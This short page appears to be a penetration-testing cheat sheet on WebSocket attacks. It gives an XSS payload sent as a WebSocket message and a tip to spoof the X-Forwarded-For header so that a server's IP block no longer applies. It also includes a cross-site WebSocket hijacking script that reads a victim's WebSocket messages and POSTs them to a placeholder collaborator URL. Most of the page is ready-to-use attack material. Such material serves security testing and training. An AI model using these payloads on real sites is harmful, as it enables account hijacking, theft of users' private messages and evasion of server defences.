Manipulating Websocket to exploit Vulnerabilities | {"message":"<img src=1 onerror='alert(1)'>"}
{"message":"<img src=1 onerror='alert(1)'>"}
In case the server Blacklists You by filtering Websocket attack | use X-Forwarded-For {ip} to ublock the chat back
Cross Site Websocket hijacking
<script> var ws = new WebSocket('wss://your-websocket-url'); ws.onopen = function() { ws.send("READY"); }; ws.onmessage = function(event) { fetch('<https://your-collaborator-url>', {method: 'POST', mode: 'no-cors', body: event.data}); }; </script>
Last updated 3 months ago